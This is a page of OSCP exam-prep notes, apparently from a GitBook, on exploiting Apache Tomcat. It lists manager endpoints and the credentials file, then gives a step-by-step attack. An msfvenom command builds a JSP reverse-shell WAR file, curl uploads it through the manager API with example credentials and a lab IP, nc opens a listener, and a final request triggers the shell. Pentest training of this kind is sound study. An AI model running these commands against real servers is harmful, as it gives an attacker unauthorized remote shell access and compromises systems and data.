🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Intresting Endpoints
  • Important Files
  • Exploitation
  • NO-GUI

Was this helpful?

  1. Enumeration
  2. HTTP/ HTTPS
  3. CMS Exploitation

Tomcat

PreviousBluditNextDrupal

Last updated 2 years ago

Was this helpful?

Tomcat is like a secondary service usually runs on port 8080

Intresting Endpoints

/manager/html
/host-manager/html

Important Files

tomcat-users.xml # contains usernames and passwords

Exploitation

  • Create a malicious .war file deploy it and obtain reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

  • Once deployed make a request to http://targeturi:8080/shell to obtain the reverse shell

NO-GUI

  • Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'

# listen for a reverse shell
nc -lvnp 1234

# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
source : hackingarticles